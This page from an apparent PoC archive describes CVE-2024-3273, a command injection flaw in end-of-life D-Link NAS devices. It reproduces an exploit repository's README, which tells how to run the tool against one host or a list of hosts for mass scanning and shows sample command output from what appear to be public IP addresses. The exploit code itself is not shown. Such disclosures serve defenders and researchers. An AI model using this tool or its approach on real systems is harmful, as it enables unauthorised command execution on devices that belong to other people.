Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-3273 PoC — D-Link DNS-320L/DNS-325/DNS-327L/DNS-340L HTTP GET Request nas_sharing.cgi command injection

Source
https://github.com/adhikara13/CVE-2024-3273
Associated Vulnerability
Title:D-Link DNS-320L/DNS-325/DNS-327L/DNS-340L HTTP GET Request nas_sharing.cgi command injection (CVE-2024-3273)
Description:** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
Description
Exploit for CVE-2024-3273, supports single and multiple hosts
Readme
# CVE-2024-3273 Proof of Concept (PoC)

This repository contains a Proof of Concept (PoC) for CVE-2024-3273, a security vulnerability discovered in D-Link NAS devices. The vulnerability allows attackers to execute arbitrary commands on vulnerable devices.

## Description

CVE-2024-3273 is a vulnerability in D-Link NAS devices that allows remote attackers to execute arbitrary commands via a crafted HTTP request to the `cgi-bin/nas_sharing.cgi` endpoint.

This PoC demonstrates how the vulnerability can be exploited to execute commands on vulnerable D-Link NAS devices.

## Requirements

- Python 3.x
- `requests` library

## Usage

1. Clone this repository:

    ```bash
    git clone https://github.com/adhikara13/CVE-2024-3273.git
    ```

2. Navigate to the repository directory:

    ```bash
    cd CVE-2024-3273
    ```

3. Run the PoC:

    ```bash
    python main.py
    ```

4. Follow the on-screen instructions to choose the target device:
   
   - **Option 1: Single Host (1)**: Enter details for a single target device, including the host IP address and command to run.
   - **Option 2: Multiple Hosts (2)**: Provide a file containing multiple target devices in the format `host:port`, and choose whether to export vulnerable hosts to `vulnerables.txt`.

## Example

```
┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛

Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi

┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛

Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
```

## Disclaimer

This PoC is for educational and research purposes only. Use it responsibly and only on devices you are authorized to test.

## Contributing

Contributions are welcome! If you find any issues or improvements, feel free to open an issue or create a pull request.
File Snapshot

 [4.0K]  /data/pocs/88cb9b504aeb82055e14ca3956f3b13c0e8b8c44
├── [ 34K]  LICENSE
├── [2.6K]  main.py
└── [2.4K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →